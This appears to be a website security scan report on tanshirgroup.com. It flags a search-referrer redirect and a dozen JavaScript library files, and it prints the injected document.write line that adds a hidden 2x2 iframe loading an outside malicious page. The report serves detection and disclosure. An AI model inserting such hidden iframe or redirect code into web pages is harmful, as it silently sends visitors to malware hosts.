Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://tanshirgroup.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: tanshirgroup.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sun, 07 Sep 2014 14:27:31 GMT Location: http://from-ai-dai-lane.bplaced.net/aawf.html?h=1726348 Server: Apache Content-Length: 239 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://tanshirgroup.com/ | 200 OK Content-Length: 20669 Content-Type: text/html | clean |
http://tanshirgroup.com/js1/l10n0001.js | 200 OK Content-Length: 481 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348></iframe>');
function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b}; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348> | ||
http://tanshirgroup.com/js1/jquery-2.js | 200 OK Content-Length: 91842 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348></iframe>');
(function(a,b){function cu(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cr(a){if(!cg[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ch||(ch=c.createElement("iframe"),ch.frameBorder=ch.width=ch.height=0),b.appendCh Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348> | ||
http://tanshirgroup.com/js1/modernj0.js | 200 OK Content-Length: 43204 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348></iframe>');
window.Modernizr = (function( window, document, undefined ) { var version = '2.0', Modernizr = {}, enableClasses = true, docElement = document.documentElement, docHead = document.head || document.getElementsByTagName('head')[0], mod = 'm Modernizr.prefixed = function(prop){ return testPropsAll(prop, 'pfx'); }; docElement.className = docElement.className.replace(/\bno-js\b/, '') + (enableClasses ? ' js ' + classes.join(' ') : ''); return Modernizr; })(this, this.document); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348> | ||
http://tanshirgroup.com/js1/superfit.js | 200 OK Content-Length: 3885 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348></iframe>');
;(function($){ $.fn.superfish = function(op){ var sf = $.fn.superfish, c = sf.c, $arrow = $(['<span class="',c.arrowClass,'"> »</span>'].join('')), over = function(){ var $$ = $(this), menu = getMenu($$); clearTimeout(menu.sfTimer); o.onHide.call($ul); return this; }, showSuperfishUl : function(){ var o = sf.op, sh = sf.c.shadowClass+'-off', $ul = this.addClass(o.hoverClass) .find('>ul:hidden').css('visibility','visible'); sf.IE7fix.call($ul); o.onBeforeShow.call($ul); $ul.animate(o.animation,o.speed,function(){ sf.IE7fix.call($ul); o.onShow.call($ul); }); return this; } }); })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348> | ||
http://tanshirgroup.com/js1/jquery05.js | 200 OK Content-Length: 25040 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348></iframe>');
(function($){$.prettyPhoto={version:'3.1.3'};$.fn.prettyPhoto=function(pp_settings){pp_settings=jQuery.extend({animation_speed:'fast',slideshow:5000,autoplay_slideshow:false,opacity:0.80,show_title:true,allow_resize:true,default_width:500,default_height:344,counter_separator_label:'/',theme:'pp_default',ho function getParam(name,url){name=name.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]");var regexS="[\\?&]"+name+"=([^&#]*)";var regex=new RegExp(regexS);var results=regex.exec(url);return(results==null)?"":results[1];}})(jQuery);var pp_alreadyInitialized=false; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348> | ||
http://tanshirgroup.com/js1/jquery06.js | 200 OK Content-Length: 582 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348></iframe>');
jQuery(function() { jQuery('#gallery .portfolio li img').hide(); }); jQuery(window).bind('load', function() { var i = 1; var imgs = jQuery('#gallery .portfolio li img').length; var int = setInterval(function() { if(i >= imgs) clearInterval(int); jQuery('#gallery .portfolio li img:hidden').eq(0).fadeIn(300); i++; }, 300); }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348> | ||
http://tanshirgroup.com/js1/swfobjed.js | 200 OK Content-Length: 10393 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348></iframe>');
var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=type Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348> | ||
http://tanshirgroup.com/js1/jquery07.js | 200 OK Content-Length: 47249 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348></iframe>');
;(function($) { var ver = '2.99'; if ($.support == undefined) { $.support = { opacity: !($.browser.msie) }; } function debug(s) { $.fn.cycle.debug && log(s); } function log() { window.console && console.log && console.log('[cycle] var bb = b < h ? b + parseInt(step * ((h-b)/count || 1)) : h; var rr = r < w ? r + parseInt(step * ((w-r)/count || 1)) : w; $next.css({ clip: 'rect('+tt+'px '+rr+'px '+bb+'px '+ll+'px)' }); (step++ <= count) ? setTimeout(f, 13) : $curr.css('display', 'none'); })(); }); $.extend(opts.cssBefore, { display: 'block', opacity: 1, top: 0, left: 0 }); opts.animIn = { left: 0 }; opts.animOut = { left: 0 }; }; })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348> | ||
http://tanshirgroup.com/js1/audio001.js | 200 OK Content-Length: 28007 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348></iframe>');
(function(audiojs, audiojsInstance, container) { var path = (function() { var re = new RegExp('audio(\.min)?\.js.*'), scripts = document.getElementsByTagName('script'); for (var i = 0, ii = scripts.length; i < ii; i++) { var path = scripts[i].getAttribute( tag = tag || '*', els = node.getElementsByTagName(tag), pattern = new RegExp("(^|\\s)"+searchClass+"(\\s|$)"); for (i = 0, j = 0, l = els.length; i < l; i++) { if (pattern.test(els[i].className)) { matches[j] = els[i]; j++; } } } return matches.length > 1 ? matches : matches[0]; } })('audiojs', 'audiojsInstance', this); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348> | ||
http://tanshirgroup.com/js1/custom01.js | 200 OK Content-Length: 1257 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348></iframe>');
$(document).ready(function(){ $(".tabs").each(function(){ $(this).find(".tab").hide(); $(this).find(".tab-menu li:first a").addClass("active").show(); $(this).find(".tab:first").show(); }); $(".tabs").each(function(){ $(this).find(".tab-menu a").click( $(this).parent().parent().parent().parent().find(".tab").hide(); var activeTab = $(this).attr("href"); $(activeTab).fadeIn(); return false; }); }); $(".toggle").each(function(){ $(this).find(".box").hide(); }); $(".toggle").each(function(){ $(this).find(".trigger").click(function() { $(this).toggleClass("active").next().stop(true, true).slideToggle("normal"); return false; }); }); }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348> | ||
http://tanshirgroup.com/js1/FF-cash0.js | 200 OK Content-Length: 549 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348></iframe>');
if($.browser.mozilla||$.browser.opera) (function(){ window.addEventListener('pageshow', PageShowHandler, false); window.addEventListener('unload', UnloadHandler, false); function PageShowHandler() { window.addEventListener('unload', UnloadHandler, false); } function UnloadHandler() { window.removeEventListener('beforeunload', UnloadHandler, false); } })() Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348> | ||
http://tanshirgroup.com/js1/comment0.js | 200 OK Content-Length: 959 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348></iframe>');
addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form-div"),o=n.I(n.respondId);if(!e||!o){return}n.I("comment_parent").value="0";e.parentNode.insertBefore(o,e);e.parentNode.removeChild(e);this.style.display="none";this.onclick=null;return false};try{m.I("comment").focus()}catch(g){}return false},I:function(a){return document.getElementById(a)}}; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348> | ||
http://tanshirgroup.com/js/swfobjec.js | 200 OK Content-Length: 9759 Content-Type: application/javascript | clean |
http://tanshirgroup.com/js1/jquery08.js | 200 OK Content-Length: 26923 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348></iframe>');
;(function($) { $.fn.ajaxSubmit = function(options) { if (!this.length) { log('ajaxSubmit: skipping submit process - no element selected'); return this; } var method, action, url, $form = this; if (typeof options == 'function') { options = { success: options $sel.find('option').selected(false); } this.selected = select; } }); }; function log() { var msg = '[jquery.form] ' + Array.prototype.join.call(arguments,''); if (window.console && window.console.log) { window.console.log(msg); } else if (window.opera && window.opera.postError) { window.opera.postError(msg); } }; })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://from-ai-dai-lane.bplaced.net/aawf.html?j=1726348> |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tanshirgroup.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tanshirgroup.com/
Result: tanshirgroup.com is not infected or malware details are not published yet.
Result: tanshirgroup.com is not infected or malware details are not published yet.